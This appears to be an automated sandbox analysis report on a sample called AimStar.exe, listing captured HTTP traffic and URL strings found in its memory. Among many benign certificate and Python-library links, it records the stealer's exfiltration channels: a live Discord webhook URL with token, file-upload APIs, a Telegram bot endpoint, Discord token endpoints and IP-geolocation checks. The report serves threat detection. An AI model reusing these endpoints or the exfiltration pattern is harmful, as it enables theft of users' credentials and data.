HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Jan 2025 21:12:36 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735765958x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhGPHmf2CkQpxNJKrU3FALioK3d3Ezz5k2Wlz3Gfy8iHMBtU9bCd4dyhhw7icRi4woK8y%2F9mPBpUzTjNLSNTRAg9mhGkdZpOuJlrCyBMoMlGIciOTqFl0%2Bu62jFi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=a3e5254bb13bbfd0eab3271a2cd309bfca598747-1735765956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=aOFeXPXGF_hja_MGT_l13.d1SgVHLQwWi5_dvT69AJo-1735765956727-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fb5822a1b5f32d3-EWR

Source: AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: AimStar.exe, 00000002.00000003.2404700366.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216622964.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: AimStar.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: AimStar.exe, 00000002.00000003.2404700366.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2405422527.000002020D414000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CA73000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2404247268.000002020D411000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2405752519.000002020D417000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2114827606.000002168FB60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2294279709.000002A6D0038000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2211083739.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2515221982.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2207955452.000001B10EE45000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000002.2516056869.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2214000099.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: AimStar.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: AimStar.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: libcrypto-3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: AimStar.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: AimStar.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: AimStar.exe, 00000002.00000003.2046920935.000002020C5FC000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2049843028.000002020C5E4000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2029404019.000002020C5E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.60.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: SIHClient.exe, 0000003C.00000003.2207955452.000001B10EE45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?05cf9f1
Source: AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: AimStar.exe, 00000002.00000002.2409740452.000002020CA48000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2056832978.000002020CA58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020C958000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr~
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr~r
Source: powershell.exe, 0000000C.00000002.2164613926.000002169FD97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C80AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2287372527.000002A6C81EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: AimStar.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: AimStar.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: AimStar.exe	String found in binary or memory: http://ocsp.sectigo.com0$
Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: AimStar.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: AimStar.exe	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000C.00000002.2115599827.000002168FF48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000C.00000002.2115599827.000002168FD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B8031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.2115599827.000002168FF48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: AimStar.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: AimStar.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: AimStar.exe, 00000000.00000003.2021718981.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: AimStar.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9634000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: AimStar.exe, 00000000.00000003.2020018489.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020501405.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000000.00000003.2020414423.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: AimStar.exe	String found in binary or memory: http://www.heaventools.com
Source: AimStar.exe	String found in binary or memory: http://www.heaventools.comDVarFileInfo$
Source: AimStar.exe, 00000002.00000002.2408279953.000002020C488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: AimStar.exe, 00000002.00000003.2403909784.000002020D300000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2415755951.000002020E070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: AimStar.exe, 00000002.00000002.2415755951.000002020E0B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 0000000C.00000002.2115599827.000002168FD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2230160700.000002A6B8031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadr#
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr~
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr~r
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DB20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000039.00000002.2230160700.000002A6B999E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: AimStar.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: AimStar.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: AimStar.exe	String found in binary or memory: https://d.symcb.com/rpa0.
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: AimStar.exe, 00000002.00000002.2411399871.000002020D0B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1323748851462705204/cFp6eq42ADGLAf_FT0MA15Miw7tWNx5rwD4SKkxk-ZhCNAp
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: AimStar.exe, 00000002.00000002.2409508482.000002020C730000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: AimStar.exe, 00000002.00000002.2407233564.000002020C174000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: AimStar.exe, 00000002.00000002.2407233564.000002020C174000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: AimStar.exe, 00000002.00000002.2407233564.000002020C0F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: AimStar.exe, 00000002.00000002.2410298641.000002020CC97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dsc.gg/skochworld
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dsc.gg/skochworldi
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dsc.gg/skochworldr#
Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AimStar.exe, 00000002.00000003.2403445118.000002020DA06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: powershell.exe, 00000039.00000002.2230160700.000002A6B9918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: AimStar.exe, 00000002.00000002.2407233564.000002020C174000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: AimStar.exe, 00000002.00000002.2410298641.000002020CB38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: AimStar.exe, 00000002.00000002.2408279953.000002020C430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: AimStar.exe, 00000002.00000002.2411216305.000002020CFB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920p
Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: AimStar.exe, 00000002.00000002.2411768598.000002020D1B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
Source: powershell.exe, 00000039.00000002.2230160700.000002A6B8E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: AimStar.exe, 00000002.00000003.2404700366.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216622964.000002020CAF5000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2408722689.000002020C530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: AimStar.exe, 00000002.00000002.2410298641.000002020CCD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: AimStar.exe, 00000002.00000002.2408722689.000002020C636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: AimStar.exe, 00000002.00000002.2409740452.000002020CAF6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i.pinimg.com/736x/ec/43/75/ec4375c15336ba1e72b0062c515a1d92.jpg
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://i.pinimg.com/736x/ec/43/75/ec4375c15336ba1e72b0062c515a1d92.jpgz
Source: AimStar.exe, 00000002.00000002.2410298641.000002020CB38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: AimStar.exe, 00000002.00000002.2415755951.000002020E0A4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
